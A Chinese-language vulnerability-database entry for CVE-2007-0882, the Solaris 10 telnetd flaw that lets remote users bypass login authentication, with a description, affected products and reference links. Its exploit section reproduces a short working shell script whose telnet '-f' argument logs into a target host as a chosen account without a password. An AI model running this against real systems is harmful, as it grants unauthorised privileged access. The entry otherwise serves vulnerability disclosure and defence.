Sun Solaris Telnet服务远程绕过认证漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112202 漏洞类型 代码注入
发布时间 2007-02-11 更新时间 2007-11-05
CVE编号 CVE-2007-0882 CNNVD-ID CNNVD-200702-224
漏洞平台 Solaris CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/3293
https://www.securityfocus.com/bid/22512
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200702-224
|漏洞详情
Solaris是一款由Sun开发和维护的商业性质UNIX操作系统。Solaris10的TELNET服务在处理畸形的认证数据时存在漏洞,远程攻击者可能利用此漏洞绕过认证获得访问。Solaris10的Telnet守护进程未经检查将用户可能提交的畸形参数直接传递给login进程处理,login进程由此执行非预期的用户身份切换操作。这可能允许用户无需口令便可以某些特权用户权限登录到系统,获得完全的系统访问,如果系统未能对root用户登录位置作限制,获取root用户访问也是可能的。目前这个漏洞正在被积极的利用。
|漏洞EXP
#!/bin/sh
# CLASSIFIED CONFIDENTIAL SOURCE MATERIAL
#
# *********************ATTENTION********************************
# THIS CODE _MUST NOT_ BE DISCLOSED TO ANY THIRD PARTIES
# (C) COPYRIGHT Kingcope, 2007
#
################################################################
echo ""
echo "SunOS 5.10/5.11 in.telnetd Remote Exploit by Kingcope kingcope@gmx.net"
if [ $# -ne 2 ]; then
echo "./sunos <host> <account>"
echo "./sunos localhost bin"
exit
fi
echo ""
echo "ALEX ALEX"
echo ""
telnet -l"-f$2" $1

# milw0rm.com [2007-02-11]
|受影响的产品
Sun Solaris 10.0_x86 Sun Solaris 10.0 Nortel Networks Self-Service - Peri Application Rel 3.0 Nortel Networks Self-Service - CCSS7 0 Nortel Networks Media Processing Svr 500 Rel 3.0
|参考资料

来源:US-CERT
名称:TA07-059A
链接:http://www.us-cert.gov/cas/techalerts/TA07-059A.html
来源:US-CERT
名称:VU#881872
链接:http://www.kb.cert.org/vuls/id/881872
来源:XF
名称:solaris-telnet-authentication-bypass(32434)
链接:http://xforce.iss.net/xforce/xfdb/32434
来源:SECTRACK
名称:1017625
链接:http://www.securitytracker.com/id?1017625
来源:BID
名称:22512
链接:http://www.securityfocus.com/bid/22512
来源:BUGTRAQ
名称:20070214RE:[Full-disclosure]Solaristelnetvulnberability-howmanyonyournetwork?
链接:http://www.securityfocus.com/archive/1/archive/1/460103/100/100/threaded
来源:BUGTRAQ
名称:20070214Solaristelnetvulnsolutionsdigestandnetworkrisks
链接:http://www.securityfocus.com/archive/1/archive/1/460086/100/100/threaded
来源:BUGTRAQ
名称:20070213Re:[BLACKLIST][Full-disclosure]Solaristelnetvulnberability-howmanyonyournetwork?
链接:http://www.securityfocus.com/archive/1/archive/1/459980/100/0/threaded
来源:BUGTRAQ
名称:20070212Re:[BLACKLIST][Full-disclosure]Solaristelnetvulnberability-howmanyonyournetwork?
链接:http://www.securityfocus.com/archiv